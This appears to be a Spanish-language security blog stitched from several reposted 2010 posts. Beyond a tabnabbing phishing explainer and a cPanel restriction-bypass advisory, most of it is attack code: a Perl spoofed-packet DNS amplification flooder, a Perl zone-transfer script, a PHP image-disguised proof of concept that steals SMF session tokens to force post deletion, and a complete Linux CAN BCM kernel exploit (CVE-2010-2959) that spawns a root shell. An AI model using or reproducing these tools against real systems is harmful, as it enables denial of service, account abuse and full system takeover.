Un usuario navega hacia la página del atacante, que no tiene por qué simular ningún banco o página de login. Simplemente es una página más equipada con un código JavaScript que hará el “truco”.

La víctima cambia de pestaña (o de programa, lo importante es que pierda el foco) y sigue con sus visitas cotidianas a otras páginas. Mientras, la web del atacante cambia por completo gracias al JavaScript: el favicon, el título, el cuerpo… todo excepto el dominio, lógicamente. La página ahora podría parecerse a (por ejemplo) la web de login de Gmail. La víctima, vuelve a la pestaña más tarde y piensa que ha caducado su sesión. Introduce sus credenciales y estos viajan en dirección al atacante.

Se supone que el usuario bajará la guardia puesto que, hasta ahora, se supone que una pestaña no “muta” a nuestras espaldas y por tanto, si aparece como “Gmail”, por ejemplo, es que lo hemos visitado previamente. Los usuarios que mantengan habitualmente muchas pestañas abiertas, saben que es fácil olvidar qué se está visitando exactamente en cada momento.

Según el propio descubridor, se podría investigar en el historial de CSS del navegador para averiguar qué páginas visita el usuario y mostrarse como una de ellas dinámicamente, para hacer más efectivo el ataque. Existen otros métodos para incluso averiguar en qué sitios está realmente autenticado el usuario, con lo que la técnica resultaría más efectiva.

Si el atacante consigue incrustar JavaScript en la web real que se quiere falsificar (por ejemplo a través de publicidad contratada a terceros) entonces la página cambiaría sobre el dominio real… y entonces sí supondría un ataque “casi perfecto”.

El descubridor, en su entrada http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/ ha colgado una prueba de concepto. Si se visita esa web, luego se pasa a otra pestaña durante 5 segundos (tiempo arbitrario impuesto por el descubridor), y se vuelve, mostrará una imagen de Gmail que toma de http://img.skitch.com/20100524-b639xgwe … 387ene.png superpuesta sobre la página. Cambiará el favicon y el título. Obviamente, el ataque en este ejemplo está específicamente diseñado para que sea “visible”.

Supone un método ingenioso y nuevo de intentar suplantar una página. Funciona en Firefox, Opera y (de forma un poco irregular) en Internet Explorer 8. Parece que Chrome no es vulnerable, aunque es posible que aparezcan métodos para que sí lo sea.

El ataque sigue confiando en que el usuario no este pendiente de la direccion URL, por tanto, cuando la víctima vuelve a la pestaña, estaría ante un caso de phishing “tradicional” sino fuera porque la pestaña cambió “a sus espaldas”. Realmente pensamos que no será un ataque puesto en práctica de forma masiva por los atacantes, aunque obviamente puede ser utilizado selectivamente. La razón es que el phishing tradicional, burdo y sin trucos, sigue funcionando y reportando importantes beneficios a quienes lo ponen en práctica sin mayores complicaciones técnicas. Y ambos se basan en que el usuario medio NO aprovecha los beneficios de los certificados ni se fija en las URLs donde introduce las contraseñas.

Mitigación

Para no sufrir “tabnabbing”, es necesario fijarse en las URLs antes de introducir contraseñas, como siempre. Desactivar JavaScript para las páginas en las que no se confíe, ya sea a través de la Zonas para Internet Explorer o No-Script para Firefox.

Fuente:vulnerabilityteam.blogspot.com

Anuncios

Zone Transfer Tool [Perl] by D0MIN1C.

Publicado: septiembre 1, 2010 en Tools Pentest
#!/usr/bin/perl

use Net::DNS;
use Net::DNS::Resolver;
$dl =log <STDIN>;
if ($dl =~ /12345/){
#coded By D0MIN1C
print "Test Tranferencia de zonas!!\n";
print "MS!!\n";
my $domain = $ARGV[0];
my $dns = $ARGV[1];
print " intentando AXFR a : ".$domain." \n";
my $res = Net::DNS::Resolver->new (debug => 1,
nameservers => [$dns]);
my @zone = $res->axfr($domain);
if(@zone) {
foreach my $rr (@zone){
$rr->print;
}
}
print "\n";

}

Net::RawIP es un modulo/libreria de perl, que nos permite hacer gran cantidad de cosas, entre las cuales esta enviar paquetes spoofeados (tcp, udp, icmp, generic), vamos a ver un ejemplo de ello, un PoC de DNS Amplification que me arme por ahi usando esta libreria.

Vamos a explicar la tecnica en cuestion (el codigo ya esta comentado xD)

El DNS Amplification aprovecha que el protocolo UDP no es orientado a conexiones, envia un paquete DNS con origen spoofeado (como es logico xD), a un servidor DNS cualquiera, este respondera a la victima.

¿por que es eficiente?

Vamos a dar un ejemplo con dig:

xianur0@Zer0-Null:~/Net-RawIP-0.25$ dig @192.168.1.254 . ANY

; <<>> DiG 9.6.1-P2 <<>> @192.168.1.254 . ANY
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 53160
;; flags: qr rd ra; QUERY: 1, ANSWER: 14, AUTHORITY: 0, ADDITIONAL: 11

;; QUESTION SECTION:
;.				IN	ANY

;; ANSWER SECTION:
.			452834	IN	NS	c.root-servers.net.
.			452834	IN	NS	e.root-servers.net.
.			452834	IN	NS	f.root-servers.net.
.			452834	IN	NS	d.root-servers.net.
.			452834	IN	NS	b.root-servers.net.
.			452834	IN	NS	j.root-servers.net.
.			452834	IN	NS	g.root-servers.net.
.			452834	IN	NS	l.root-servers.net.
.			452834	IN	NS	h.root-servers.net.
.			452834	IN	NS	k.root-servers.net.
.			452834	IN	NS	m.root-servers.net.
.			452834	IN	NS	a.root-servers.net.
.			452834	IN	NS	i.root-servers.net.
.			66297	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2010060800 1800 900 604800 86400

;; ADDITIONAL SECTION:
e.root-servers.net.	538845	IN	A	192.203.230.10
f.root-servers.net.	539272	IN	A	192.5.5.241
f.root-servers.net.	600142	IN	AAAA	2001:500:2f::f
d.root-servers.net.	538814	IN	A	128.8.10.90
b.root-servers.net.	538838	IN	A	192.228.79.201
j.root-servers.net.	538827	IN	A	192.58.128.30
j.root-servers.net.	600142	IN	AAAA	2001:503:c27::2:30
g.root-servers.net.	538716	IN	A	192.112.36.4
l.root-servers.net.	538832	IN	A	199.7.83.42
l.root-servers.net.	157464	IN	AAAA	2001:500:3::42
h.root-servers.net.	538823	IN	A	128.63.2.53

;; Query time: 1328 msec
;; SERVER: 192.168.1.254#53(192.168.1.254)
;; WHEN: Tue Jun  8 16:00:21 2010
;; MSG SIZE  rcvd: 497

es decir, nosotros solicitamos el registro any de un punto (root/raiz), y el servidor DNS nos respondio con el listado de los servidores DNS root de internet.

a cualquier servidor DNS que preguntemos esto por lo regular respondera con dicho listado. Ahora si nosotros enviamos un paquete DNS (como se ha dicho con el origen spoofeado xD) preguntando esto mismo, el servidor DNS respondera a la victima, por lo cual este ataque se amplifica (es mucho mayor lo que el servidor DNS envia que lo que nosotros enviamos).

Ahora va el PoC:

#!/usr/bin/perl
 

# By Xianur0
# uxmal666@gmail.com

use Net::DNS;
use Net::RawIP qw(:pcap);

print "\t\tDNS Amplification Attack By Xianur0\n\n";
my $usage = "\nUso: $0 [victima] [servidor] [Puerto victima (udp)] [N. Paquetes] [Registro]\n";

die $usage unless $ARGV[0] && $ARGV[1] && $ARGV[2] && $ARGV[3] && $ARGV[4];

my $fuckingvar1=$ARGV[0];
my $fuckingvar2=$ARGV[1];
my $fuckingvar4=$ARGV[2];
my $fuckingvar5='53';
my $registro = $ARGV[4];
my $domain = ".";
my $fuckingvar6 = 4000;
$fuckingvar6 = $ARGV[3] if ($ARGV[3] != 0);

my $packet_r = Net::DNS::Packet->new($domain, $registro, "IN"); # creamos el paquete
my $udp_r = new Net::RawIP({ip=> {saddr=>$fuckingvar1, daddr=>$fuckingvar2}, udp=>{source=>$fuckingvar4, dest=>$fuckingvar5}}); # especificamos los valores (IP Spoofeada, destino (victima), puerto origen (puerto a donde se enviara la respuesta del DNS) y destino)

print "Enviando...\n";
for($fuck = 0; $fuck < $fuckingvar6; $fuck++) {
$udp_r->set({udp=>{data=>$packet_r->data}});
$udp_r->send();
}

print "Enviado!\n";

El SMF en muchas secciones agrega sesc, no es malo, pues ayuda a controlar los XSRF’s, el problema se encuentra presisamente en eso, el mecanismo es bueno, pero la implementacion no tanto…

el sesc se genera unico por cada session que inicia un usuario, de modo que ese sesc se seguira usando para todo lo que haga el usuario mientras este logeado, luego ese sesc se agrega en algunas secciones en LA URL!

Esto permite a un atacante mediante muy poca ingenieria social obtener el sesc de un usuario, por ejemplo, diseñe un PoC, que simula ser una imagen, la podemos insertar en un post real, y cuando otro usuario cite un comentario del tema, y si esta activado el Topic Summary, se cargan las imagenes publicadas en el post dentro de esa seccion (Topic Summary), de modo que al cargar las imagenes se agrega un Referer (el cual, entre otras cosas contiene el sesc del usuario). Ahora la prueba de concepto un PHP:

<?php
// By Xianur0
$imagen = "imagen real.jpg";
error_reporting(0);
function borrar($path,$topic,$sesc) {
if(!preg_match("/index.php$/",$path)) $path = preg_replace("/\/([^\/]+)$/","/",$path);
header("Location: ".$path."?action=removetopic2;topic=".$topic.";sesc=".$sesc,TRUE,302);
}

function mostrarimagen($imagen) {
header("Content-Type: image/jpeg");
print file_get_contents($imagen);
}

if(isset($_SERVER['HTTP_REFERER']) && !empty($_SERVER['HTTP_REFERER']) && preg_match("/sesc=(.{32})/i",$_SERVER['HTTP_REFERER'],$matches) && preg_match("/topic=([^;]+)/i",$_SERVER['HTTP_REFERER'],$matchess) && preg_match("/^([^\?]+)/i",$_SERVER['HTTP_REFERER'],$matchesss)) {
$sesc = $matches[1];
$topic = $matchess[1];
$path = $matchesss[1];
borrar($path,$topic,$sesc);
exit;
}
mostrarimagen($imagen);
?>

ahora mediante un poco de .htaccess esta imagen quedara completamente oculta, solo queda insertarla en un post y esperar o convencer a algun usuario a citar algun post dentro del mensaje donde pusimos la image.

Si dicho usuario tiene permisos de borrar el post, el post sera borrado.

Desde luego mediante esta misma tecnica se pueden hacer otras cosas bastante mas malignas que borrar un post.

De momento no hay parche, luego programo algo… mientras tanto, no citen mensajes xD y/o desactiven el Topic Summary

Fuente:http://xianur0.diosdelared.com/?coment=7350

Bueno este es otro de esos bugs que simplemente uno no se imagina el por que diseñaron el sistema asi, pero bue…

El captcha del SMF (action=verificationcode) basicamente lo que hace es generar un unico codigo, de modo que podemos utilizar dicho codigo en todas las consultas futuras, es decir, por ejemplo, si se logra que en la misma session se cambie la IP, esto podria permitir crear multiples usuarios unicamente contestando un unico captcha.
Del mism modo hay varios modulos que utilizan dicho captcha, de modo que todos ellos resultan afectados, por ejemplo el captcha para envio de PM’s.

Estos captchas utilizan un seqnum, el cual del mismo modo es “adivinable”, es decir teniendo un seqnum original bastaria con ir aumentando 100 o 10000 al numero inicial y esto permitira pasar ese filtrado (en el SMF se revisa que el seqnum sea >= al establecido, de modo que al ser mayor corresponderia).

Register.php:

		// Only generate a new code if one hasn't been set yet
		if (!isset($_SESSION['visual_verification_code']))
		{
			// Skip I, J, L, O and Q.
			$character_range = array_merge(range('A', 'H'), array('K', 'M', 'N', 'P'), range('R', 'Z'));

			// Generate a new code.
			$_SESSION['visual_verification_code'] = '';
			for ($i = 0; $i < 5; $i++)
				$_SESSION['visual_verification_code'] .= $character_range[array_rand($character_range)];
		}

saludos! 😉

Fuente:http://xianur0.diosdelared.com/

”’
__  __  ____         _    _ ____
|  \/  |/ __ \   /\  | |  | |  _ \
| \  / | |  | | /  \ | |  | | |_) |
| |\/| | |  | |/ /\ \| |  | |  _ <  Day 1 (0day)
| |  | | |__| / ____ \ |__| | |_) |
|_|  |_|\____/_/    \_\____/|____/

”’

abysssec Inc Public Advisory

1) Advisory information

Title               :  Cpanel  PHP Restriction Bypass Vulnerability
Version             : <= 11.25
Discovery           : http://www.abysssec.com
Vendor              :  http://www.cpanel.net
Impact              :  Ciritical
Contact            :  shahin [at] abysssec.com , info  [at] abysssec.com
Twitter             : @abysssec

2) Vulnerability Information

Class
1- Restriction Bypass Vulnerability
Impact
Attackers can use this issue to gain access to restricted files, potentially obtaining sensitive information that may aid in further attacks.It can help attacker to bypass restriction such as mod_security , Safemod and disable functions.
Remotely Exploitable
No
Locally Exploitable
Yes

3) Vulnerability details

1- Restriction Bypass Vulnerabilities:

Load All file with this structures :
[Domain | Filename ]
from :
/home/[user directory name/.fantasticodata/[Script name folder] and include all file.

Example [folder] :
/home/test/.fantasticodata/Joomla_1.5/
then include this file  :
test.com|file1

After you created your malicious file in that style you can browse this page:
http://test.com:2082/frontend/x3/fantastico/autoinstallhome.php?app=Joomla_1.5

Now your PHP code will execute without /safe_mode/Disable_function/ Mod_security due to cpanel php.ini must be run with execute permission.

Vulnerable code located in in  /usr/local/cpanel/3rdparty/fantastico/autoinstallhome.php :
Line 529 :

 function Show_Notice ( $Script , $Version_Numbers )
 {
 $Home_Directory = $GLOBALS['enc_cpanel_homedir'] ;
 if ( substr ( $Home_Directory , -1 ) != '/' )
 {
 $Home_Directory = $Home_Directory . '/' ;
 }
 $Files = Array ( ) ;
[This Place]   --->     $Directory = $Home_Directory . '.fantasticodata/' . $Script . '/' ;
 $Files = Get_Files ( $Directory ) ;
 if ( !empty ( $Files ) AND is_array ( $Files ) )
 {
 $Temporary = natcasesort ( $Files ) ;
 }
 foreach ( $Files As $File )
 {
 $Name    = '' ;
 $Path    = '' ;
 if ( strstr ( $File , "|" ) )
 {
 $Name = explode ( "|" , $File ) ;
 $Name = $Name[1] ;
 }
 else
 {
 $Name = $File ;
 }
 /* Debugging */ // echo $Directory . $File . '<br/>' ;
 if ( is_file ( $Directory . $File ) )
 {
 include $Directory . $File ;
 if ( !empty ( $thisscriptpath ) )
 {
 $Path = $thisscriptpath ;
 }
 else
 {
 $Path = $Home_Directory . 'public_html/' . $Name . '/' ;
 }
 if ( substr ( $Path , -1 ) != '/' )
 {
 $Path = $Path . '/' ;
 }
 /* Debugging */ // echo $Path . 'fantversion.php<br/><br/>' ;
 if ( is_file ( $Path . 'fantversion.php' ) )
 {
 include $Path . 'fantversion.php' ;
 if ( !empty ( $version ) )
 {
 if ( in_array ( $version , $Version_Numbers ) )
 {
 return 'Yes' ;
 }
 }
 }
 }
 }
 return 'No' ;
 }

/*
* i-CAN-haz-MODHARDEN.c
*
* Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit
* Jon Oberheide
* http://jon.oberheide.org
*
* Information:
*
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2959
*
* Ben Hawkes discovered an integer overflow in the Controller Area Network
* (CAN) subsystem when setting up frame content and filtering certain
* messages. An attacker could send specially crafted CAN traffic to crash
* the system or gain root privileges.
*
* Usage:
*
* $ gcc i-can-haz-modharden.c -o i-can-haz-modharden
* $ ./i-can-haz-modharden
* ...
* [+] launching root shell!
* # id
* uid=0(root) gid=0(root)
*
* Notes:
*
* The allocation pattern of the CAN BCM module gives us some desirable
* properties for smashing the SLUB. We control the kmalloc with a 16-byte
* granularity allowing us to place our allocation in the SLUB cache of our
* choosing (we'll use kmalloc-96 and smash a shmid_kernel struct for
* old-times sake). The allocation can also be made in its own discrete
* stage before the overwrite which allows us to be a bit more conservative
* in ensuring the proper layout of our SLUB cache.
*
* To exploit the vulnerability, we first create a BCM RX op with a crafted
* nframes to trigger the integer overflow during the kmalloc. On the second
* call to update the existing RX op, we bypass the E2BIG check since the
* stored nframes in the op is large, yet has an insufficiently sized
* allocation associated with it. We then have a controlled write into the
* adjacent shmid_kernel object in the 96-byte SLUB cache.
*
* However, while we control the length of the SLUB overwrite via a
* memcpy_fromiovec operation, there exists a memset operation that directly
* follows which zeros out last_frames, likely an adjacent allocation, with
* the same malformed length, effectively nullifying our shmid smash. To
* work around this, we take advantage of the fact that copy_from_user can
* perform partial writes on x86 and trigger an EFAULT by setting up a
* truncated memory mapping as the source for the memcpy_fromiovec operation,
* allowing us to smash the necessary amount of memory and then pop out and
* return early before the memset operation occurs.
*
* We then perform a dry-run and detect the shmid smash via an EIDRM errno
* from shmat() caused by an invalid ipc_perm sequence number. Once we're
* sure we have a shmid_kernel under our control we re-smash it with the
* malformed version and redirect control flow to our credential modifying
* calls mapped in user space.
*
* Distros: please use grsecurity's MODHARDEN or SELinux's module_request
* to restrict unprivileged loading of uncommon packet families. Allowing
* the loading of poorly-written PF modules just adds a non-trivial and
* unnecessary attack surface to the kernel.
*
* Targeted for 32-bit Ubuntu Lucid 10.04 (2.6.32-21-generic), but ports
* easily to other vulnerable kernels/distros. Careful, it could use some
* post-exploitation stability love as well.
*
* Props to twiz, sgrakkyu, spender, qaaz, and anyone else I missed that
* this exploit borrows code from.
*/


#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <inttypes.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <sys/mman.h>
#include <sys/stat.h>

#define SLUB “kmalloc-96”
#define ALLOCATION 96
#define FILLER 100

#ifndef PF_CAN
#define PF_CAN 29
#endif

#ifndef CAN_BCM
#define CAN_BCM 2
#endif

struct sockaddr_can {
sa_family_t can_family;
int can_ifindex;
union {
struct { uint32_t rx_id, tx_id; } tp;
} can_addr;
};

struct can_frame {
uint32_t can_id;
uint8_t can_dlc;
uint8_t data[8] __attribute__((aligned(8)));
};

struct bcm_msg_head {
uint32_t opcode;
uint32_t flags;
uint32_t count;
struct timeval ival1, ival2;
uint32_t can_id;
uint32_t nframes;
struct can_frame frames[0];
};

#define RX_SETUP 5
#define RX_DELETE 6
#define CFSIZ sizeof(struct can_frame)
#define MHSIZ sizeof(struct bcm_msg_head)
#define IPCMNI 32768
#define EIDRM 43
#define HDRLEN_KMALLOC 8

struct list_head {
struct list_head *next;
struct list_head *prev;
};

struct super_block {
struct list_head s_list;
unsigned int s_dev;
unsigned long s_blocksize;
unsigned char s_blocksize_bits;
unsigned char s_dirt;
uint64_t s_maxbytes;
void *s_type;
void *s_op;
void *dq_op;
void *s_qcop;
void *s_export_op;
unsigned long s_flags;
} super_block;

struct mutex {
unsigned int count;
unsigned int wait_lock;
struct list_head wait_list;
void *owner;
};

struct inode {
struct list_head i_hash;
struct list_head i_list;
struct list_head i_sb_list;
struct list_head i_dentry_list;
unsigned long i_ino;
unsigned int i_count;
unsigned int i_nlink;
unsigned int i_uid;
unsigned int i_gid;
unsigned int i_rdev;
uint64_t i_version;
uint64_t i_size;
unsigned int i_size_seqcount;
long i_atime_tv_sec;
long i_atime_tv_nsec;
long i_mtime_tv_sec;
long i_mtime_tv_nsec;
long i_ctime_tv_sec;
long i_ctime_tv_nsec;
uint64_t i_blocks;
unsigned int i_blkbits;
unsigned short i_bytes;
unsigned short i_mode;
unsigned int i_lock;
struct mutex i_mutex;
unsigned int i_alloc_sem_activity;
unsigned int i_alloc_sem_wait_lock;
struct list_head i_alloc_sem_wait_list;
void *i_op;
void *i_fop;
struct super_block *i_sb;
void *i_flock;
void *i_mapping;
char i_data[84];
void *i_dquot_1;
void *i_dquot_2;
struct list_head i_devices;
void *i_pipe_union;
unsigned int i_generation;
unsigned int i_fsnotify_mask;
void *i_fsnotify_mark_entries;
struct list_head inotify_watches;
struct mutex inotify_mutex;
} inode;

struct dentry {
unsigned int d_count;
unsigned int d_flags;
unsigned int d_lock;
int d_mounted;
void *d_inode;
struct list_head d_hash;
void *d_parent;
} dentry;

struct file_operations {
void *owner;
void *llseek;
void *read;
void *write;
void *aio_read;
void *aio_write;
void *readdir;
void *poll;
void *ioctl;
void *unlocked_ioctl;
void *compat_ioctl;
void *mmap;
void *open;
void *flush;
void *release;
void *fsync;
void *aio_fsync;
void *fasync;
void *lock;
void *sendpage;
void *get_unmapped_area;
void *check_flags;
void *flock;
void *splice_write;
void *splice_read;
void *setlease;
} op;

struct vfsmount {
struct list_head mnt_hash;
void *mnt_parent;
void *mnt_mountpoint;
void *mnt_root;
void *mnt_sb;
struct list_head mnt_mounts;
struct list_head mnt_child;
int mnt_flags;
const char *mnt_devname;
struct list_head mnt_list;
struct list_head mnt_expire;
struct list_head mnt_share;
struct list_head mnt_slave_list;
struct list_head mnt_slave;
struct vfsmount *mnt_master;
struct mnt_namespace *mnt_ns;
int mnt_id;
int mnt_group_id;
int mnt_count;
} vfsmount;

struct file {
struct list_head fu_list;
struct vfsmount *f_vfsmnt;
struct dentry *f_dentry;
void *f_op;
unsigned int f_lock;
unsigned long f_count;
} file;

struct kern_ipc_perm {
unsigned int lock;
int deleted;
int id;
unsigned int key;
unsigned int uid;
unsigned int gid;
unsigned int cuid;
unsigned int cgid;
unsigned int mode;
unsigned int seq;
void *security;
};

struct shmid_kernel {
struct kern_ipc_perm shm_perm;
struct file *shm_file;
unsigned long shm_nattch;
unsigned long shm_segsz;
time_t shm_atim;
time_t shm_dtim;
time_t shm_ctim;
unsigned int shm_cprid;
unsigned int shm_lprid;
void *mlock_user;
} shmid_kernel;

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

int __attribute__((regparm(3)))
kernel_code(struct file *file, void *vma)
{
commit_creds(prepare_kernel_cred(0));
return -1;
}

unsigned long
get_symbol(char *name)
{
FILE *f;
unsigned long addr;
char dummy;
char sname[512];
int ret = 0, oldstyle;

f = fopen(“/proc/kallsyms”, “r”);
if (f == NULL) {
f = fopen(“/proc/ksyms”, “r”);
if (f == NULL)
return 0;
oldstyle = 1;
}

while (ret != EOF) {
if (!oldstyle) {
ret = fscanf(f, “%p %c %s\n”, (void **) &addr, &dummy, sname);
} else {
ret = fscanf(f, “%p %s\n”, (void **) &addr, sname);
if (ret == 2) {
char *p;
if (strstr(sname, “_O/”) || strstr(sname, “_S.”)) {
continue;
}
p = strrchr(sname, ‘_’);
if (p > ((char *) sname + 5) && !strncmp(p – 3, “smp”, 3)) {
p = p – 4;
while (p > (char *)sname && *(p – 1) == ‘_’) {
p–;
}
*p = ”;
}
}
}
if (ret == 0) {
fscanf(f, “%s\n”, sname);
continue;
}
if (!strcmp(name, sname)) {
printf(“[+] resolved symbol %s to %p\n”, name, (void *) addr);
fclose(f);
return addr;
}
}
fclose(f);

return 0;
}

int
check_slabinfo(char *cache, int *active_out, int *total_out)
{
FILE *fp;
char name[64], slab[256];
int active, total, diff;

memset(slab, 0, sizeof(slab));
memset(name, 0, sizeof(name));

fp = fopen(“/proc/slabinfo”, “r”);
if (!fp) {
printf(“[-] sorry, /proc/slabinfo is not available!”);
exit(1);
}

fgets(slab, sizeof(slab) – 1, fp);
while (1) {
fgets(slab, sizeof(slab) – 1, fp);
sscanf(slab, “%s %u %u”, name, &active, &total);
diff = total – active;
if (strcmp(name, cache) == 0) {
break;
}
}
fclose(fp);

if (active_out) {
*active_out = active;
}
if (total_out) {
*total_out = total;
}
return diff;
}

void
trigger(void)
{
int *shmids;
int i, ret, sock, cnt, base, smashed;
int diff, active, total, active_new, total_new;
int len, sock_len, mmap_len;
struct sockaddr_can addr;
struct bcm_msg_head *msg;
void *efault;
char *buf;

printf(“[+] creating PF_CAN socket…\n”);

sock = socket(PF_CAN, SOCK_DGRAM, CAN_BCM);
if (sock < 0) {
printf(“[-] kernel lacks CAN packet family support\n”);
exit(1);
}

printf(“[+] connecting PF_CAN socket…\n”);

memset(&addr, 0, sizeof(addr));
addr.can_family = PF_CAN;

ret = connect(sock, (struct sockaddr *) &addr, sizeof(addr));
if (sock < 0) { printf(“[-] could not connect CAN socket\n”); exit(1); } len = MHSIZ + (CFSIZ * (ALLOCATION / 16)); msg = malloc(len); memset(msg, 0, len); msg->can_id = 2959;
msg->nframes = (UINT_MAX / CFSIZ) + (ALLOCATION / 16) + 1;

printf(“[+] clearing out any active OPs via RX_DELETE…\n”);

msg->opcode = RX_DELETE;
ret = send(sock, msg, len, 0);

printf(“[+] removing any active user-owned shmids…\n”);

system(“for shmid in `cat /proc/sysvipc/shm | awk ‘{print $2}’`; do ipcrm -m $shmid > /dev/null 2>&1; done;”);

printf(“[+] massaging ” SLUB ” SLUB cache with dummy allocations\n”);

diff = check_slabinfo(SLUB, &active, &total);

shmids = malloc(sizeof(int) * diff * 10);

cnt = diff * 10;
for (i = 0; i < cnt; ++i) {
diff = check_slabinfo(SLUB, &active, &total);
if (diff == 0) {
break;
}
shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT);
}
base = i;

if (diff != 0) {
printf(“[-] inconsistency detected with SLUB cache allocation, please try again\n”);
exit(1);
}

printf(“[+] corrupting BCM OP with truncated allocation via RX_SETUP…\n”);

i = base;
cnt = i + FILLER;
for (; i < cnt; ++i) { shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT); } msg->opcode = RX_SETUP;
ret = send(sock, msg, len, 0);
if (ret < 0) {
printf(“[-] kernel rejected malformed CAN header\n”);
exit(1);
}

i = base + FILLER;
cnt = i + FILLER;
for (; i < cnt; ++i) { shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT); } printf(“[+] mmap’ing truncated memory to short-circuit/EFAULT the memcpy_fromiovec…\n”); mmap_len = MHSIZ + (CFSIZ * (ALLOCATION / 16) * 3); sock_len = MHSIZ + (CFSIZ * (ALLOCATION / 16) * 4); efault = mmap(NULL, mmap_len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); printf(“[+] mmap’ed mapping of length %d at %p\n”, mmap_len, efault); printf(“[+] smashing adjacent shmid with dummy payload via malformed RX_SETUP…\n”); msg = (struct bcm_msg_head *) efault; memset(msg, 0, mmap_len); msg->can_id = 2959;
msg->nframes = (ALLOCATION / 16) * 4;

msg->opcode = RX_SETUP;
ret = send(sock, msg, mmap_len, 0);
if (ret != -1 && errno != EFAULT) {
printf(“[-] couldn’t trigger EFAULT, exploit aborting!\n”);
exit(1);
}

printf(“[+] seeking out the smashed shmid_kernel…\n”);

i = base;
cnt = i + FILLER + FILLER;
for (; i < cnt; ++i) { ret = (int) shmat(shmids[i], NULL, SHM_RDONLY); if (ret == -1 && errno == EIDRM) { smashed = i; break; } } if (i == cnt) { printf(“[-] could not find smashed shmid, trying running the exploit again!\n”); exit(1); } printf(“[+] discovered our smashed shmid_kernel at shmid[%d] = %d\n”, i, shmids[i]); printf(“[+] re-smashing the shmid_kernel with exploit payload…\n”); shmid_kernel.shm_perm.seq = shmids[smashed] / IPCMNI; buf = (char *) msg; memcpy(&buf[MHSIZ + (ALLOCATION * 2) + HDRLEN_KMALLOC], &shmid_kernel, sizeof(shmid_kernel)); msg->opcode = RX_SETUP;
ret = send(sock, msg, mmap_len, 0);
if (ret != -1 && errno != EFAULT) {
printf(“[-] couldn’t trigger EFAULT, exploit aborting!\n”);
exit(1);
}

ret = (int) shmat(shmids[smashed], NULL, SHM_RDONLY);
if (ret == -1 && errno != EIDRM) {
setresuid(0, 0, 0);
setresgid(0, 0, 0);

printf(“[+] launching root shell!\n”);

execl(“/bin/bash”, “/bin/bash”, NULL);
exit(0);
}

printf(“[-] exploit failed! retry?\n”);
}

void
setup(void)
{
printf(“[+] looking for symbols…\n”);

commit_creds = (_commit_creds) get_symbol(“commit_creds”);
if (!commit_creds) {
printf(“[-] symbol table not availabe, aborting!\n”);
}

prepare_kernel_cred = (_prepare_kernel_cred) get_symbol(“prepare_kernel_cred”);
if (!prepare_kernel_cred) {
printf(“[-] symbol table not availabe, aborting!\n”);
}

printf(“[+] setting up exploit payload…\n”);

super_block.s_flags = 0;

inode.i_size = 4096;
inode.i_sb = &super_block;
inode.inotify_watches.next = &inode.inotify_watches;
inode.inotify_watches.prev = &inode.inotify_watches;
inode.inotify_mutex.count = 1;

dentry.d_count = 4096;
dentry.d_flags = 4096;
dentry.d_parent = NULL;
dentry.d_inode = &inode;

op.mmap = &kernel_code;
op.get_unmapped_area = &kernel_code;

vfsmount.mnt_flags = 0;
vfsmount.mnt_count = 1;

file.fu_list.prev = &file.fu_list;
file.fu_list.next = &file.fu_list;
file.f_dentry = &dentry;
file.f_vfsmnt = &vfsmount;
file.f_op = &op;

shmid_kernel.shm_perm.key = IPC_PRIVATE;
shmid_kernel.shm_perm.uid = getuid();
shmid_kernel.shm_perm.gid = getgid();
shmid_kernel.shm_perm.cuid = getuid();
shmid_kernel.shm_perm.cgid = getgid();
shmid_kernel.shm_perm.mode = -1;
shmid_kernel.shm_file = &file;
}

int
main(int argc, char **argv)
{
setup();
trigger();
return 0;
}